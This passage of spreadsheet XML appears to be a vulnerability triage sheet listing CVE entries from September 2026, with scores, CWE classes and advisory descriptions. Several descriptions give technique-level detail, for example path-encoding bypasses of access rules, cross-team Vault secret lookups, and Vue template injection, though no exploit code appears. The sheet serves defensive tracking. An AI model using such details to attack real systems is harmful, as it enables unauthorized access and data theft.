      <c r="H14" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>libfyaml 0.9.6 contains a stack exhaustion vulnerability in fy_atom_iter_format(). When processing a specially crafted YAML document containing a very large literal or folded block scalar, the function repeatedly grows an internal buffer using alloca() inside a loop. The allocated stack memory is not released until the function returns, causing cumulative stack growth that can exceed the process stack limit and result in SIGSEGV and denial of service.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88359</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88367</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>NanoSVG 239e102ec contains an incorrect numeric conversion vulnerability in nsvg__curveDivs() during SVG stroke rasterization. A specially crafted SVG document containing an extremely large stroke-width can cause floating-point rounding to produce a zero subdivision angle. The subsequent arc division yields infinity, which is converted to int without range validation, resulting in undefined behavior and process termination, leading to denial of service.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88367</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95811</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-180, CWE-863</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Lemonldap::NG::Handler versions from 2.0.0 before 2.16.10, from 2.17.0 before 2.21.6, from 2.22.0 before 2.23.4 for Perl allow an equivalent spelling of a path to bypass the locationRules that restrict it.
The handler matches each vhost's locationRules regular expressions against REQUEST_URI, the raw request line, while the web server routes on the path it has already percent-decoded and normalized. A request that percent-encodes a character of the path, inserts dot segments, or doubles a slash therefore reaches the protected resource under a URI that no rule regexp matches, and the vhost's default rule decides access. Deny rules, identity and group conditions, and unprotect and skip rules are bypassed alike.
Only a vhost whose default rule is more permissive than its other rules is affected. An authenticated user then reaches any URL a locationRules regexp was meant to restrict, but gains no more than that default rule already grants.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95811</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97636</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>hashicorp, gin</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow HashiCorp provider: the HashiCorp Vault secrets backend's team-scope guard can be bypassed with a user-controlled key. In a multi-team deployment, a Dag author scoped to one team can supply a Variable key containing a path separator that causes the backend to resolve a secret belonging to a different team, because after the team-scoped lookup misses the backend falls back to a team-agnostic path concatenated from the unvalidated key. The Execution API Variables route accepts a path-shaped key, so this is reachable from ordinary Dag code.
Affects multi-team deployments using the HashiCorp Vault secrets backend. Single-team deployments are not affected, as there is no cross-team boundary to cross. This is the same class as CVE-2026-86465, CVE-2026-68870, CVE-2026-68871 and CVE-2026-68872 in the Akeyless, Azure Key Vault, Yandex Lockbox and Amazon secrets backends.
Users of apache-airflow-providers-hashicorp are recommended to upgrade to version 4.8.0 or later, which fixes the issue.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97636</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 6.0)</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93353</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-424, CWE-59</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>copyparty contains a volume restriction bypass vulnerability in its SFTP front end that allows authenticated SFTP users to create, remove, and truncate arbitrary paths outside permitted volume boundaries by exploiting three handlers that bypass the xvol volflag enforcement. The _mkdir, _rmdir, and _chattr handlers construct destination paths using vfs.get(), vn.canonical(), and os.path.join() without invoking the chk_ap access check, enabling attackers to traverse symlinks leaving a volume's top directory and perform unauthorized file creation, deletion, or truncation via SSH_FXP_SETSTAT operations on paths outside any volume the account is authorized to access.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93353</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88386</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>libsndfile 1.2.2 contains a misaligned memory access issue in psf_binheader_readf() while parsing WAV fmt chunks. A specially crafted WAV file can cause the function to cast an unaligned destination address to unsigned int * and perform a 4-byte store. This results in undefined behavior leading to denial of service.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88386</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97326</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in songxinjianqwe Chat up to ac63d25297079eed5e4ba7e88d3b7a032637150d. Affected by this issue is some unknown functionality of the file chat-server/src/main/java/cn/sinjinsong/chat/server/ChatServer.java of the component chat-server. This manipulation causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97326</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97646</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. This affects an unknown function of the file admin/fun/getStudent.php. This manipulation of the argument sid causes authorization bypass. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97646</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88370</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>libconfini 1.16.4 contains a heap out-of-bounds write condition involving the bundled load_ini_buffer.h utility and strip_ini_cache(). The bundled utility allocates exactly ini_length bytes, while strip_ini_cache() unconditionally writes a NUL terminator at ini_source[ini_length], requiring an additional writable byte. Applications using the bundled allocation pattern can trigger deterministic heap memory corruption when processing any non-empty INI input, resulting in denial of service.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88370</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 5.3)</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97225</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in DbGate up to 7.2.5-beta.5. This affects an unknown function of the file packages/api/src/controllers/runners.js of the component JSON Runner. Executing a manipulation of the argument comment.text/script.schedule can lead to code injection. The attack may be performed from remote. Upgrading to version 7.2.5-beta.6 mitigates this issue. This patch is called 70e7b6b58e464d7a015ba16e8d7574b420ee4877. Upgrading the affected component is advised. This issue is distinct from CVE-2026-47668.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97225</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.4 → 5.1)</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48543</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>express, vue, gin</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>Krayin CRM through 2.2.6 contains a stored client-side template injection vulnerability that allows authenticated attackers to execute arbitrary JavaScript in other users' browsers by injecting Vue.js template expressions into the web form description field. Attackers can craft a web form description containing double-brace template syntax that reaches the Vue template compiler, enabling prototype chain traversal to retrieve the Function constructor and execute attacker-supplied JavaScript in the application origin for every user who views the affected web form.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48543</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97320</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>vue</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.08. The affected element is the function AiKnowledgeDocumentServiceImpl.readUrl of the file AiKnowledgeDocumentServiceImpl.java of the component AI Knowledge Module. This manipulation of the argument url causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97320</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97325</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>vue</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.08. Affected by this vulnerability is the function validOAuthClientFromCache of the file yudao-module-system/src/main/java/cn/iocoder/yudao/module/system/service/oauth2/OAuth2ClientServiceImpl.java of the component OAuth2 Client. The manipulation of the argument redirect_uri results in open redirect. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97325</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97366</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>react</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in jhen0409 react-native-debugger up to 0.14.0. The impacted element is the function openDevTools of the file electron/window.js of the component Open in Editor Handler. The manipulation of the argument host results in os command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97366</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97368</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
